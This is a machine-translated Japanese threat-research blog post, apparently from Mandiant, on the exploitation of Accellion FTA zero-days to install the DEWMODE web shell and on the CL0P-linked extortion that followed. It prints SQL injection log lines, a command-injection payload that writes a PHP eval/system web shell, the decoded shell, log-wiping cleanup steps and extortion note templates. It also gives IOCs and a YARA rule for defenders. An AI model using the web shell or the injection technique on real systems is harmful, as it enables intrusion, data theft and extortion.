ブログ(脅威調査)

サイバー犯罪者がデータ窃取と恐喝のためのAccellion FTAをエクスプロイト

2020年12月中ごろから、UNC2546としてMandiantが追跡している悪意のある攻撃者は、新しく発見されたDEWMODEというWeb Shellをインストールするために、Accellionのレガシー製品であるFile Transfer Appliance (FTA)で複数のゼロデイ脆弱性を悪用しました。UNC2546の動機はすぐには明らかにはなりませんでしたが、2021年1月後半から、UNC2546の影響を受けていた複数の組織が、盗まれたデータを「CL0P^_LEAKS」で公開するという内容を、脅威と思われる関係者からのエクスポート・メールで受信し始めました。ウェブサイトで公開された被害者データの一部は、DEWMODE Web Shellを使用して窃取されたようです。

特に、「CL0P^_LEAKS」というシェーミングなウェブサイトの被害者数は、2021年2月に、これらの攻撃者グループによって最近、米国、シンガポール、カナダ、オランダの組織で増加しました。Mandiantは以前に.orionのサイトに掲載された、FIN11によって窃取された被害者情報と同じ脅威だと報告しています。このサイトは、CLOPランサムウェアの配備後、被害者に拡張要求を支払わせるための追加的な戦術に関するものです。しかしながら、最近のCLOP拡張インシデントでは、ランサムウェアは配備されず、FIN11の他の特徴も存在しませんでした。

現在、レガシーFTA製品をUNC2546として実行している組織からのゼロデイAccellion FTAの脆弱性とデータ窃取の悪用、そしてその後のUNC2582としてのエクスポート活動を追跡しています。私たちは、UNC2582、UNC2546、および以前のFIN11操作間の重複を識別し、これらの活動クラスタ間の関係を評価し続けます。「UNC」指定の利用の詳細については、ブログ「DebUNCing Attribution: Mandiant による未分類の攻撃者の追跡方法」を参照してください。

Mandiantはこれらの問題に対応してAccellionと密接に協力しており、今後数週間で完全なセキュリティ・アセスメント・レポートを作成する予定です。この時点で、Accellionは攻撃者グループによって悪用されることが知られているすべてのFTA脆弱性にパッチを適用し、これらの攻撃ベクトルに関連する異常にフラグを付けるための新しい監視および警告機能を追加しました。Mandiantは、これらのパッチを検証しました。Mandiantは現在、Accellion FTA製品の現行バージョンのペネトレーション・テスト・サービスとコード・レビューを行っていますが、当社の分析では、FTA製品に他の重大な脆弱性は見つかっていません。FTAのレガシー製品を使用しているお客様が増加したことが、攻撃の標的となりました。

Accellion FTAは20年来の製品で、寿命に近づいています。Accellionは、FTAのお客様がAccellionのエンタープライズ・コンテント・ファイアウォール・プラットフォームであるkiteworksに移行することを強く推奨しています。AccellionとKiteworksはまったく異なるコード・ベースで構築されます。

次のCVEは、最近パッチが適用されたAccellion FTAの脆弱性を追跡するために用意されています。

  • CVE-2021-27101 - 作成されたホスト・ヘッダーを介したSQLインジェクション
  • CVE-2021-27102 - ローカルWebサービス呼び出しを介したOSコマンドの実行
  • CVE-2021-27103 - 作成されたPOSTリクエストを介したSSRF
  • CVE-2021-27104 - 作成されたPOST要求を介したOSコマンドの実行

UNC2546とDEWMODE

2020年12月中ごろ、Mandiantは複数インシデントに対応し、DEWMODEとよばれるWeb Shellを用いて、Accellion FTAデバイスからデータを抽出しました。Accellion FTAデバイスは、企業が大きなファイルを安全に転送するという目的に合わせて設計されたアプリケーションです。フィルタリング活動は、幅広い分野や国のエンティティに影響を与えています。

これらのインシデントを通じて、Mandiantは、DEWMODE Web Shellを展開するためのFTAデバイスの利用を含む、共通基盤ストラクチャ使用とTTPを観察しました。Mandiantは、現在、UNC2546として追跡している攻撃グループが、この活動を担当していると判断しました。DEWMODEのインストールに活用された脆弱性の詳細はまだ分析中ですが、複数クライアント調査からの証拠はUNC2546の活動において多数の共通点を示しています。

悪用の証拠とDEWMODEの導入

Mandiantは、ネットワーク内部への侵入から、DEWMODEの導入、後続のやり取りまで、影響を受けるデバイスからのApacheとシステム・ログを調べることによって、どのようにAccellion FTAが侵害されたかについて、詳細の多くを再構築できるようになりました。

このキャンペーンに関連する活動の最も早い識別は、2020年12月中ごろに行われました。この時点で、MandiantはAccellion FTAでSQLインジェクションの脆弱性を利用しているUNC2546を特定しました。このSQLインジェクションは、主侵入ベクターとして機能しました。

Mandiantは、図1に示すように、SQLインジェクションの証拠と、それに続く追加リソースへの要求を監視しました。

[21/Dec/2020:18:14:32 +0000] [.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#9700968/initial] (1) pass through /courier/document_root.html

[21/Dec/2020:18:14:33 +0000] ['))union(select(loc_id)from(net1.servers)where(proximity)=(0))#/sid#935ee00][rid#9706978/initial] (1) pass through /courier/document_root.html

[21/Dec/2020:18:14:33 +0000] [.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#971c098/initial] (1) pass through /courier/document_root.html

[21/Dec/2020:18:14:34 +0000] [<redacted>/sid#935ee00][rid#971a090/initial] (1) pass through /courier/sftp_account_edit.php

[21/Dec/2020:18:14:35 +0000] [<redacted>/sid#935ee00][rid#9706978/initial] (1) pass through /courier/oauth.api

[21/Dec/2020:18:14:35 +0000] [<redacted>/sid#935ee00][rid#9708980/initial] (1) pass through /courier/oauth.api

 

図1:SQLインジェクション・ログ

UNC2546は、このSQLインジェクションの脆弱性を利用して、ファイルsftp_account_edit.phpへの要求と併せて使用されるように見えるキーを取得しました。このリクエストの直後に、組み込みのAccellionユーティリティadmin.plが実行されたため、eval Web Shellがoauth.apiに書き込まれました。

PWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --edit_user=F
--mount_cifs=-
V,DF,$(echo${IFS}PD9waHAKCmlmKGlzc2V0KCRfUkVRVUVTVFsndG9rZW4nXSkpCnsKICAgIGV2YWwoYm
FzZTY0X2RlY29kZSgkX1JFUVVFU1RbJ3Rva2VuJ10pKTsKfQplbHNlIGlmKGlzc2V0KCRfUkVRVUVTVFsnd
XNlcm5hbWUnXSkpCnsKICAgIHN5c3RlbSgkX1JFUVVFU1RbJ3VzZXJuYW1lJ10pOwp9CmVsc2UKewogICAgaG
VhZGVyKCdMb2NhdGlvbjogLycpOwp9|base64${IFS}-d|tee${IFS}/home/seos/courier/oauth.api);FUK;",PASSWORD # \" --passwd=pop

図2:eval Web Shellの作成を示すログからの抜粋

解読内容を図3に示します。

<?php

if(isset($_REQUEST['token']))
{
    eval(base64_decode($_REQUEST['token']));
}
else if(isset($_REQUEST['username']))
{
    system($_REQUEST['username']);
}
else
{
    header('Location: /');
}

図3:デコードされたeval Web Shell

このシーケンスのほぼ直後に、DEWMODE Web Shellがシステムに書き込まれます。これらのリクエストのタイミングは、DEWMODEがoauth.api経由で配信されたことを示しています。ただし、使用可能な証拠は、DEWMODEをディスクに書き込むために使用されるメカニズムを示していません。

Mandiantは、次の2つの場所のいずれかでDEWMODE Web Shellを識別しました。

  • /home/seos/courier/about.html
  • /home/httpd/html/about.html

DEWMODE Web Shell(図4) は、FTA上のMySQLデータベースから使用可能なファイルのリストを抽出し、それらのファイルと対応するメタデータ(ファイルID、パス、ファイル名、アップローダー、および受信者)をHTMLページに一覧表示します。次に、UNC2546は表示されたリストを使用し、DEWMODE Web Shellを介してファイルをダウンロードします。ダウンロード要求はFTAのWebログにキャプチャされます。このログには、暗号化およびエンコードされたURLパラメータを封じ込めDEWMODE Web Shellへの要求が含まれます。ここでは、dwnはファイルパス、fnは要求されたファイル名です(図5) 。ログに表示される暗号化されたファイルパスと名称の値は、ターゲットFTAが使用するデータベースから取得したキー・マテリアルを使用して復号できます。このプロセスの複雑な性質を考慮し、組織が関連するログを確認する際に支援が必要な場合は、MandiantまたはAccellionにお問い合わせください。


図4:DEWMODE Web Shellのスクリーンショット

GET /courier/about.html?dwn=[REDACTED]&fn=[REDACTED] HTTP/1.1" 200 1098240863 "-" "-" "-" TLSv1.2 ECDHE-RSA-AES128-SHA256

図5:DEWMODE File Download URLパラメータ

ファイルのダウンロードに続いて、UNC2546は、値11454bd782bb41db213d415e10a0fb3cを持つcsrftokenという名前の特定のクエリー・パラメーターをDEWMODEに渡すことによって、クリーンアップ・ルーチンを開始します。以下のアクションが実行されます。

  • シェルス・クリプトが/tmp/.scrに書き込まれます:
    • /var/opt/apache/にあるログファイルからabout.htmlへの参照をすべて削除
    • 変更したログファイルを/tmp/xに書き込み、/var/opt/apache/にある元のログファイルを置換
    • /home/seos/log/adminpl.logログファイルの内容を削除
    • /home/seos/courier/about.html (DEWMODE)および/home/seos/courier/oauth.api (eval Web Shell) を削除し、コマンド出力をファイル/tmp/.outにリダイレクト
    • すべてのユーザーが出力ファイルの権限を読み取り可能、書き込み可能、実行可能に変更し、ユーザーを「nobody」に設定
  • クリーンアップを支援するために、スクリプトファイル/tmp/.scrおよびその他の一時的に作成されたファイルを削除
  • 要求ユーザーへのクリーンアップ出力の表示

クリーンアップ要求とその後のクリーンアップ・スクリプトの実行の例を図6に示します。

GET /courier/about.html?csrftoken=11454bd782bb41db213d415e10a0fb3c HTTP/1.1" 200 5 "-" "https://[REDACTED]//courier/about.html?aid=1000" "Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101

sft sudo:   nobody : TTY=unknown ; PWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --mount_cifs=AF,DF,'$(sh /tmp/.scr)',PASSWORD

図6:DEWMODEクリーンアップ要求

また、Mandiantは、/home/seos/courier/の代わりに/home/httpd/html/ディレクトリから/var/log/secureをワイプし、about.htmlおよびoauth.apiを削除するなど、クリーンアップ動作に軽微な変更を加えたDEWMODE (bdfd11b1b092b7c61ce5f02ffc5ad55a) のバリアントも識別しました。

インシデントのサブセットで、Mandiantはcache.js.gzという名前のファイルを要求するUNC2546を観察しました(図7)。mysqldumpユーティリティおよびmysqlデータディレクトリへのテンポラル・ファイル・アクセスに基づいて、アーカイブにはデータベースのダンプが含まれている可能性があります。cache.js.gzを除き、MandiantはDEWMODE以外の方法でAccellionアプライアンスからファイルを取得するUNC2546を監視していません。

GET //courier/cache.js.gz HTTP/1.1" 200 35654360 "-" "-" "python-requests/2.24.0" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256

図7:cache.js.gzファイル要求

UNC2582データ窃取と恐喝

Web Shellのインストール後すぐに、数時間以内の複数のケースで、UNC2546は侵害されたFTAインスタンスからファイルをダウンロードするためにDEWMODEを利用しました。攻撃者の動機はすぐには明確にはなりませんでしたが、DEWMODE Web Shellの納品から数週間後に、被害者はCLOPランサムウェア・チームとの協力を主張する攻撃者から転送メールを受け取り始めました(図8と図9) 。攻撃者は、"CL0P^_LEAKS”. onionでデータを公開することを脅迫しました。被害者が身代金を支払わない限り、ウェブサイトを偽装します。私たちは、別の脅威クラスタUNC2582の下で、その後の脅迫活動を追跡しています。別の脅威クラスタでの悪用と脅迫活動を追跡しているにもかかわらず、攻撃者がUNC2582属性の脅迫Eメールを送信するために使用されたホストからDEWMODE Web Shellと対話した少なくとも1つの事例を観察しました。

Hello!

Your network has been hacked, a lot of valuable data stolen. <description of stolen data, including the total size of the compressed files> We are the CLOP ransomware team, you can google news and articles about us. We have a website where we publish news and stolen files from companies that have refused to cooperate. Here is his address http://[redacted].onion/ - use TOR browser or http://[redacted].onion.dog/ - mirror. We are visited by 20-30 thousand journalists, IT experts, hackers and competitors every day. We suggest that you contact us via chat within 24 hours to discuss the current situation. <victim-specific negotiation URL> - use TOR browser We don't want to hurt, our goal is money. We are also ready to provide any evidence of the presence of files with us.

図8:Extortion Noteテンプレート1

This is the last warning!

If you don’t get in touch today, tomorrow we will create a page with screenshots of your files (like the others on our site),  send messages to all the emails that we received from your files. Due to the fact that journalists and hackers visit our site, calls and questions will immediately begin, online publications will begin to publish information about the leak, you will be asked to comment.

Do not let this happen, write to us in chat or email and we will discuss the situation!

CHAT:  <victim-specific negotiation URL>

EMAIL: [email protected]

USE TOR BROWSER!

図9:Extortion Noteテンプレート2

UNC2582は、いくつかのエンゲージメントの観察に基づき、被害者に拡張要求の支払いを促すために、エスカレーションのあるひとつのパターンに従うように見えます。最初のEメールはフリーのEメール・アカウントから送信されますが、これは被害者ごとに独自のものであり、被害者組織でのアドレス分布が一見制限されているように見えます。被害者がタイムリーに応答しない場合、数百または数千のさまざまなEメール・アカウントから、さらに多数の受信者に追加のEメールが送信され、さまざまなSMTPインフラストラクチャが使用されます。少なくともあるケースでは、盗まれたデータへのリンクとネゴシエーション・チャットを含む被害者組織のパートナーにもUNC2582がEメールを送信しました。CL0P^_LEAKSのシェーミング・ウェブサイト監視は、UNC2582が、Accellion FTA機器が最近標的になったことを公的に確認した少なくとも1つの組織を含む、複数の新しい被害者がサイトに出現したときに、窃取されたデータを公開する脅威をたどってきたことを実証しました。

FIN11とのキー・オーバーラップ

UNC2582(恐喝)とFIN11

Mandiantは、一般的なEメール送信者やCL0P^_LEAKSシェーミング・サイトの使用を含む、UNC2582のデータ窃取の拡張活動と以前のFIN11オペレーションとの重複を識別しました。FIN11はCLOPランサムウェアのデプロイメントでは既知のものですが、以前はランサムウェアのデプロイメントなしでデータ窃取のエクスポートを行っていました。これは次の場合と同様です。

  • 2021年1月に観測された一部のUNC2582エクスポートEメールは、グループに明確に帰属する最後のキャンペーンの一部を含め、2020年8月から12月の間に、複数のフィッシング・キャンペーンでFIN11によって使用されたIPアドレスおよびEメールアカウントから送信されました。
  • 新年にFIN11フィッシング活動は観測されていません。FIN11は、通常、年内休日にフィッシング詐欺行為を一時停止し、活動の幅を広げてきました。しかし、この現状の流行期は、UNC2582のデータ窃取の恐喝活動とも一致しています。
  • UNC2582拡張Eメールには、CL0P^_LEAKS Webサイトまたは被害者固有のネゴシエーション・ページへのリンクが含まれていました。リンクされたWebサイトは、従来のCLOPオペレーションをサポートするために使用されたものと同じものであり、一連のランサムウェアおよびデータ窃取のエクスポート・キャンペーンはFIN11に限定されています。

UNC2546(FTA悪用とDEWMODE) とFIN11

FIN11とUNC2546の間には、限定的なオーバーラップもあります。

  • UNC2546に侵害された組織の多くは、以前はFIN11の標的でした。
  • DEWMODE Web Shellと通信したIPアドレスは、FIN11がダウンロードやFRIENDSPEAKコマンドと制御(C2) ドメインをホストするために頻繁に使用するネットワークである"Fortunix Networks L.P."ネットブロックにありました。

予想される結果

FIN11, UNC2546, UNC2582間のオーバラップは興味深いですが、それらの関係の性質を評価しながら、これらのクラスタを別々に追跡し続けています。具体的な課題の1つは、FIN11との重複範囲が攻撃ライフサイクルの後の段階に限定されることです。UNC2546は、異なる感染ベクトルとフットホールドを使用しており、FIN11とは異なり、影響を受けるネットワークにわたってそれらの存在を拡大している主体を観察していません。したがって、FTAの悪用、DEWMODE、またはデータ窃取の拡張活動をFIN11に帰属させるには、十分な証拠がありません。SQLインジェクションを使用してDEWMODEを展開したり、別の攻撃グループからDEWMODE Web Shellへのアクセスを取得したりすることは、FIN11TTPの大幅な移行を表します。これは、グループが従来から初期の感染ベクトルとしてフィッシング・キャンペーンに依存しており、以前はゼロデイ脆弱性を使用していないことを前提としています。

謝辞

David Wong, Brandon Walters, Stephen Eckels and Jon Erickson

セキュリティ侵害インジケーター (IOCs)

DEWMODE Web Shells

MD5

SHA256

2798c0e836b907e8224520e7e6e4bb42

5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b

bdfd11b1b092b7c61ce5f02ffc5ad55a

2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7

UNC2546ソースIP

複数のUNC2546侵入で次の送信元IPアドレスが観測されました。

  • 45.135.229.179
  • 79.141.162.82
  • 155.94.160.40
  • 192.154.253.120
  • 192.52.167.101
  • 194.88.104.24

検知

FireEye検知

  • FE_Webshell_PHP_DEWMODE_1
  • FEC_Webshell_PHP_DEWMODE_1
  • Webshell.PHP.DEWMODE

Mandiant Security Validation

  • A101-515 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #1
  • A101-516 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #2

DEWMODE YARAルール

以下のYARAルールは、生産システムで使用したり、組織独自の内部テスト・プロセスを通じて最初に検証されずにブロック・ルールに通知したりなど、適切なパフォーマンスを確保し、誤検出のリスクを制限したりすることを目的としていません。この規則は、DEWMODEペイロードを識別するためのハンティングの出発点として機能することを目的としていますが、マルウェア・ファミリーが変更された場合は、時間調整が必要になることがあります。

rule DEWMODE_PHP_Webshell
{
    strings:
        $s1 = /if \(isset\(\$_REQUEST\[[\x22\x27]dwn[\x22\x27]]\)[\x09\x20]{0,32}&&[\x09\x20]{0,32}isset\(\$_REQUEST\[[\x22\x27]fn[\x22\x27]\]\)\)\s{0,256}\{/
        $s2 = "<th>file_id</th>"
        $s3 = "<th>path</th>"
        $s4 = "<th>file_name</th>"
        $s5 = "<th>uploaded_by</th>"
        $s6 = "target=\\\"_blank\\\">Download</a></td>"
        $s7 = "Content-Type: application/octet-stream"
        $s8 = "Content-disposition: attachment; filename="
    condition:
        all of them
}

本ブログは機械翻訳(MT)を使用して翻訳しています。原文と翻訳版の意味、文言が異なる場合は原文を有効とします。

原文:February 22, 2021 「Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion